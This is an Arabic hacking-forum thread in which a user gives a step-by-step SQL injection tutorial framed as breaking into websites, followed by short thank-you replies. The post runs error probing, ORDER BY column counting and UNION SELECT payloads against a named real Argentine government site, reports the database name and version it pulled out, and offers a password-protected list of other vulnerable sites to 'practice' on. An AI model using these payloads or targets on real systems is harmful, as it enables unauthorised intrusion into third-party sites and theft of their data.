اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة


النتائج 1 إلى 3 من 3

الموضوع: الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

  1. #1
    هكر مجتهد Array الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    Hasri الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة



    أولا السلام عليكم و رحمة الله تعالى و بركاته
    و شكرا على مروركم

    حاولت أن أشرح في هاذا الموضوع نوعا من أنواع اختراق المواقع و هو حقن الsql

    نبدأ على بركة الله

    1- كيفية اكتشاف ثغرات الsql

    لاكتشاف ثغرات الsql نضيف ' إلى المتغير فإذا كان الموقع مصاب سيظهر لنا خطأ
    مثلا ستظهر الجملة
    You have an error in your SQL syntaxأو
    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.......
    داخل الموقع أو سينقص أو يتغير محتوى الموقع
    ملاحظة : يمكن أن لا يضهر خطأ عند إضافة ' لكن هذا لا يعنني أن الموقع غير مصاب
    جربوا إضافة كتابة معينة إلى المتغير مثلا سأضيف Hidden pain ربما سيضهر خطأ
    مثال :
    هذا موقع مصاب
    http://www.saladillo.gov.ar/notas.php?id=1
    عند إضافة ' إلى المتغير ليصبح كالتالي
    http://www.saladillo.gov.ar/notas.php?id=1'
    سيضهر خطأ و كذلك عند إضافة كلمة ك :
    http://www.saladillo.gov.ar/notas.php?id=1hidden pain

    أرجو أن تكون الفكرة وصلت..

    2- نبدأ الاستغلال :p:p


    حسنا .. الآن بعد ما اكتشفنا الثغرة
    يجب الإن اكتشاف عدد الأعمدة
    و لذلك نقوم بإضافة
    كود PHP:
    +order+by
    ليصبح الموقع كالتالي
    كود PHP:
    http://www.saladillo.gov.ar/notas.php?id=1+order+by+ 
    و نضيف بعدها عدد أعمدة ( نحزره )
    مثلا +order+by+1إذا ضهرت الصفحة سليمة يعني العمود 1 موجود
    نواصل
    +order+by+6
    إذا ضهرت الصفحة يعني العمود 6 موجود
    نواصل إلى غاية ظهور خطأ
    مثلا في هذا الموقع عند الوصول للعمود رقم 11
    +order+by+11ضهر لي خطأ
    Warning: mysql_fetch_array(....
    يعني العمود 11 غير موجود و عدد الأعمدة هو 10
    ملاحظة : يمكن أيضا أن لا يظهر خطأ
    يمكن أن ينقص محتوى الصفحة أو يختفي .. هذا يعتبر خطأ :rolleyes:... المهم اذهب لإحضار شيئ تأكله أو تشربه و شغل مخك معي :p

    أضن إلى غاية الآن ليس هناك شيئ صعب ..

    عرفنا عدد الأعمدة ( 10 ) و بقى أن نكتشف الأعمدة المصابة ..
    نكتب بعد المتغير
    كود PHP:
    -1+union+select+1,2,3,4,5,6,7,8,9,10-- 
    ليصبح الموقع كالتالي
    كود PHP:
    http://www.saladillo.gov.ar/notas.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10-- 
    لاحظوا الأرقام كيف أضفتها من رقم أول عمود إلى آخر عمود
    نضيف الأرقام حسب عدد الأعمدة
    مثلا إن كان العدد 6
    سنضيف
    كود PHP:
    -1+union+select+1,2,3,4,5,6-- 
    و أيضا لاحضوا اشارات ال - في البداية قبل المتغير - واحدة
    و بعد المتغير إثنتان

    الآن ستضهر الأعمدة المصابة في الصفحة
    هنا ضهرت لي ... 4 . 5 . 7 .8
    هذه هي الأعمدة التي سأستعملها في الإستعلام
    كود PHP:
    database() 
    نستعمل هذا الأمر لجلب اسم القاعدة--
    كود PHP:
    version() 
    و هذا لإضهار اصدار القاعدة
    و نضعهما في مكان أحد الأعمدة المصابة مثلا مكان العمود 5 و 4
    يصبح الموقع كالتالي :
    كود PHP:
    http://www.saladillo.gov.ar/notas.php?id=-1+union+select+1,2,3,version%28%29,database%28%29,6,7,8,9,10-- 
    ظهر لي
    الإصدار : 4.1.22-standard
    اسم القاعدة :
    me000007_saladillo

    مشكلة : أمي تنادي علي لا أدري لماذا :p:p
    -------------------------------------------------------

    قبل أ أذهب أردت إخباركم أن هناك اختلاف في الحقن بين الإصدار الرابع و الإصدار الخامس
    فالرابع يعتمد على تخمين أسامي الجداول و التي تكون عادة admin - user - users- admins - usarios .... ,و شيئ من هذا القبيل
    أما الإصدار الخامس فبه شيئ اسمه INFORMATION_SCHEMA
    يساعد على استخراج أسامي الجداول

    أرجوا أن أكون قد أفدت و لو بالشيئ القليل :o:o

    الأنترنت ستنقطع اليوم و لا أملك نقودا كافية لإعادة الإشتراك----
    فأرجو أن تعذروني على عدم اكمال الموضوع-----
    و إن شاء الله سأكمل في أقرب وقت ممكن

    بخصوص الهدية فهي مجموعة مواقع مصابة للتدرب عليها..
    pass : www.aljyyosh.com



  2. #2

    افتراضي رد: الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

    مشكور اخي على تعبك بالموضوع

    تحياتي لك


  3. #3
    هكر متميز Array الصورة الرمزية هاوي حنانك
    تاريخ التسجيل
    Jun 2009
    الدولة
    أرض الحرمين
    المشاركات
    1,595

    افتراضي رد: الشرح البسيط لمقدمة في حقن الsql + هدية صغيرة

    سلمت يدااااااك على هذا الموضوع الرااااائع

    دمت في تألق وابداع



المواضيع المتشابهه

  1. برنامج برووايجينت proagent اقوى برنامج لسرقة الايميلات صور +الشرح
    بواسطة DR.X في المنتدى منتدى إختراق البريد والايميلات
    مشاركات: 48
    آخر مشاركة: 01-31-2013, 03:27 PM
  2. يا ليت تنفذون طلبي البسيط
    بواسطة { عبودي } في المنتدى منتدى الإختراق العام
    مشاركات: 0
    آخر مشاركة: 05-05-2010, 10:57 PM
  3. بنت صغيرة تنكت لا تفوووتكم
    بواسطة أستغفر الله في المنتدى المنتدى العام
    مشاركات: 0
    آخر مشاركة: 01-05-2010, 08:32 PM
  4. مساعدة صغيرة
    بواسطة guetta_vendetta في المنتدى قسم المشاكل والإستفسارات
    مشاركات: 0
    آخر مشاركة: 11-10-2009, 03:16 PM

وجد الزوار هذه الصفحة بالبحث عن:

الحقن البسيط

استغلال خطأ mysql_fetch_array():

استغلال خطا mysql_fetch_array

كيفية حقن الsql

تخمين جداول الاصدار الرابع site:www.aljyyosh.com

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •